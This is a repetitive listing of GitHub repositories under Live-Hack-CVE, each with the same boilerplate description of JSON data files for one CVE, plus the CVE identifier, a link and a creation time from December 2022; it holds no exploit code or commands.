**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3714 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3714](https://github.com/Live-Hack-CVE/CVE-2021-3714) create time: 2022-12-26T06:04:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3702 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3702](https://github.com/Live-Hack-CVE/CVE-2021-3702) create time: 2022-12-26T06:04:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-42321 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-42321](https://github.com/Live-Hack-CVE/CVE-2021-42321) create time: 2022-12-26T06:03:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3973 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3973](https://github.com/Live-Hack-CVE/CVE-2021-3973) create time: 2022-12-26T06:03:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4044 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4044](https://github.com/Live-Hack-CVE/CVE-2021-4044) create time: 2022-12-26T05:30:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-23192 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-23192](https://github.com/Live-Hack-CVE/CVE-2021-23192) create time: 2022-12-26T05:30:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-23840 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-23840](https://github.com/Live-Hack-CVE/CVE-2021-23840) create time: 2022-12-26T05:30:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3449 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3449](https://github.com/Live-Hack-CVE/CVE-2021-3449) create time: 2022-12-26T05:30:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-2032 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-2032](https://github.com/Live-Hack-CVE/CVE-2021-2032) create time: 2022-12-26T05:27:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-2154 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-2154](https://github.com/Live-Hack-CVE/CVE-2021-2154) create time: 2022-12-26T05:25:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-2194 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-2194](https://github.com/Live-Hack-CVE/CVE-2021-2194) create time: 2022-12-26T05:25:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36697 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36697](https://github.com/Live-Hack-CVE/CVE-2022-36697) create time: 2022-12-26T06:14:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36696 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36696](https://github.com/Live-Hack-CVE/CVE-2022-36696) create time: 2022-12-26T06:14:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36695 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36695](https://github.com/Live-Hack-CVE/CVE-2022-36695) create time: 2022-12-26T06:14:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36721 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36721](https://github.com/Live-Hack-CVE/CVE-2022-36721) create time: 2022-12-26T06:14:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36720 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36720](https://github.com/Live-Hack-CVE/CVE-2022-36720) create time: 2022-12-26T06:13:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36719 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36719](https://github.com/Live-Hack-CVE/CVE-2022-36719) create time: 2022-12-26T06:13:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36489 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36489](https://github.com/Live-Hack-CVE/CVE-2022-36489) create time: 2022-12-26T06:13:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36491 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36491](https://github.com/Live-Hack-CVE/CVE-2022-36491) create time: 2022-12-26T06:13:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36490 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36490](https://github.com/Live-Hack-CVE/CVE-2022-36490) create time: 2022-12-26T06:13:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36498 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36498](https://github.com/Live-Hack-CVE/CVE-2022-36498) create time: 2022-12-26T06:13:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36496 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36496](https://github.com/Live-Hack-CVE/CVE-2022-36496) create time: 2022-12-26T06:13:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36495 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36495](https://github.com/Live-Hack-CVE/CVE-2022-36495) create time: 2022-12-26T06:13:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36494 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36494](https://github.com/Live-Hack-CVE/CVE-2022-36494) create time: 2022-12-26T06:13:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36493 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36493](https://github.com/Live-Hack-CVE/CVE-2022-36493) create time: 2022-12-26T06:12:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36492 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36492](https://github.com/Live-Hack-CVE/CVE-2022-36492) create time: 2022-12-26T06:12:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36500 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36500](https://github.com/Live-Hack-CVE/CVE-2022-36500) create time: 2022-12-26T06:12:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36499 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36499](https://github.com/Live-Hack-CVE/CVE-2022-36499) create time: 2022-12-26T06:12:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36497 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36497](https://github.com/Live-Hack-CVE/CVE-2022-36497) create time: 2022-12-26T06:12:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36501 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36501](https://github.com/Live-Hack-CVE/CVE-2022-36501) create time: 2022-12-26T06:12:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36502 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36502](https://github.com/Live-Hack-CVE/CVE-2022-36502) create time: 2022-12-26T06:12:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36506 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36506](https://github.com/Live-Hack-CVE/CVE-2022-36506) create time: 2022-12-26T06:12:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36505 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36505](https://github.com/Live-Hack-CVE/CVE-2022-36505) create time: 2022-12-26T06:12:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36504 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36504](https://github.com/Live-Hack-CVE/CVE-2022-36504) create time: 2022-12-26T06:12:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36503 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36503](https://github.com/Live-Hack-CVE/CVE-2022-36503) create time: 2022-12-26T06:12:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36507 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36507](https://github.com/Live-Hack-CVE/CVE-2022-36507) create time: 2022-12-26T06:12:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36508 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36508](https://github.com/Live-Hack-CVE/CVE-2022-36508) create time: 2022-12-26T06:12:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37077 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37077](https://github.com/Live-Hack-CVE/CVE-2022-37077) create time: 2022-12-26T06:12:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36455 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36455](https://github.com/Live-Hack-CVE/CVE-2022-36455) create time: 2022-12-26T06:12:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36510 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36510](https://github.com/Live-Hack-CVE/CVE-2022-36510) create time: 2022-12-26T06:12:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36509 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36509](https://github.com/Live-Hack-CVE/CVE-2022-36509) create time: 2022-12-26T06:12:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-29450 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-29450](https://github.com/Live-Hack-CVE/CVE-2020-29450) create time: 2022-12-26T04:47:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28595 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28595](https://github.com/Live-Hack-CVE/CVE-2020-28595) create time: 2022-12-26T04:44:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28596 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28596](https://github.com/Live-Hack-CVE/CVE-2020-28596) create time: 2022-12-26T04:44:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6068 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6068](https://github.com/Live-Hack-CVE/CVE-2020-6068) create time: 2022-12-26T04:44:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6067 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6067](https://github.com/Live-Hack-CVE/CVE-2020-6067) create time: 2022-12-26T04:44:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6069 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6069](https://github.com/Live-Hack-CVE/CVE-2020-6069) create time: 2022-12-26T04:44:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6066 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6066](https://github.com/Live-Hack-CVE/CVE-2020-6066) create time: 2022-12-26T04:44:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28591 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28591](https://github.com/Live-Hack-CVE/CVE-2020-28591) create time: 2022-12-26T04:43:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28597 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28597](https://github.com/Live-Hack-CVE/CVE-2020-28597) create time: 2022-12-26T04:43:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28593 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28593](https://github.com/Live-Hack-CVE/CVE-2020-28593) create time: 2022-12-26T04:43:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6088 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6088](https://github.com/Live-Hack-CVE/CVE-2020-6088) create time: 2022-12-26T04:43:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-35506 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-35506](https://github.com/Live-Hack-CVE/CVE-2020-35506) create time: 2022-12-26T04:43:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28594 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28594](https://github.com/Live-Hack-CVE/CVE-2020-28594) create time: 2022-12-26T04:43:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28589 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28589](https://github.com/Live-Hack-CVE/CVE-2020-28589) create time: 2022-12-26T04:43:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-23196 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-23196](https://github.com/Live-Hack-CVE/CVE-2021-23196) create time: 2022-12-26T04:50:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-23858 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-23858](https://github.com/Live-Hack-CVE/CVE-2021-23858) create time: 2022-12-26T04:49:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-23861 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-23861](https://github.com/Live-Hack-CVE/CVE-2021-23861) create time: 2022-12-26T04:49:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-23862 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-23862](https://github.com/Live-Hack-CVE/CVE-2021-23862) create time: 2022-12-26T04:49:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4218 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4218](https://github.com/Live-Hack-CVE/CVE-2021-4218) create time: 2022-12-26T04:49:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-22898 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-22898](https://github.com/Live-Hack-CVE/CVE-2021-22898) create time: 2022-12-26T04:49:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-22892 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-22892](https://github.com/Live-Hack-CVE/CVE-2021-22892) create time: 2022-12-26T04:49:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-22894 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-22894](https://github.com/Live-Hack-CVE/CVE-2021-22894) create time: 2022-12-26T04:49:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33844 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33844](https://github.com/Live-Hack-CVE/CVE-2021-33844) create time: 2022-12-26T04:48:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-23210 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-23210](https://github.com/Live-Hack-CVE/CVE-2021-23210) create time: 2022-12-26T04:48:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-23172 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-23172](https://github.com/Live-Hack-CVE/CVE-2021-23172) create time: 2022-12-26T04:48:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-23159 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-23159](https://github.com/Live-Hack-CVE/CVE-2021-23159) create time: 2022-12-26T04:48:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-22897 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-22897](https://github.com/Live-Hack-CVE/CVE-2021-22897) create time: 2022-12-26T04:48:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-22907 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-22907](https://github.com/Live-Hack-CVE/CVE-2021-22907) create time: 2022-12-26T04:48:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-22900 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-22900](https://github.com/Live-Hack-CVE/CVE-2021-22900) create time: 2022-12-26T04:48:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-22882 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-22882](https://github.com/Live-Hack-CVE/CVE-2021-22882) create time: 2022-12-26T04:48:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-22916 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-22916](https://github.com/Live-Hack-CVE/CVE-2021-22916) create time: 2022-12-26T04:48:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-22917 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-22917](https://github.com/Live-Hack-CVE/CVE-2021-22917) create time: 2022-12-26T04:48:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24027 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24027](https://github.com/Live-Hack-CVE/CVE-2021-24027) create time: 2022-12-26T04:48:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24163 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24163](https://github.com/Live-Hack-CVE/CVE-2021-24163) create time: 2022-12-26T04:48:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-22911 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-22911](https://github.com/Live-Hack-CVE/CVE-2021-22911) create time: 2022-12-26T04:47:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-22952 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-22952](https://github.com/Live-Hack-CVE/CVE-2021-22952) create time: 2022-12-26T04:47:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-22941 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-22941](https://github.com/Live-Hack-CVE/CVE-2021-22941) create time: 2022-12-26T04:47:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24146 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24146](https://github.com/Live-Hack-CVE/CVE-2021-24146) create time: 2022-12-26T04:47:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-23019 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-23019](https://github.com/Live-Hack-CVE/CVE-2021-23019) create time: 2022-12-26T04:47:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-22957 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-22957](https://github.com/Live-Hack-CVE/CVE-2021-22957) create time: 2022-12-26T04:47:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24158 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24158](https://github.com/Live-Hack-CVE/CVE-2021-24158) create time: 2022-12-26T04:47:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24164 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24164](https://github.com/Live-Hack-CVE/CVE-2021-24164) create time: 2022-12-26T04:47:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24188 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24188](https://github.com/Live-Hack-CVE/CVE-2021-24188) create time: 2022-12-26T04:47:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4112 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4112](https://github.com/Live-Hack-CVE/CVE-2021-4112) create time: 2022-12-26T04:46:54Z

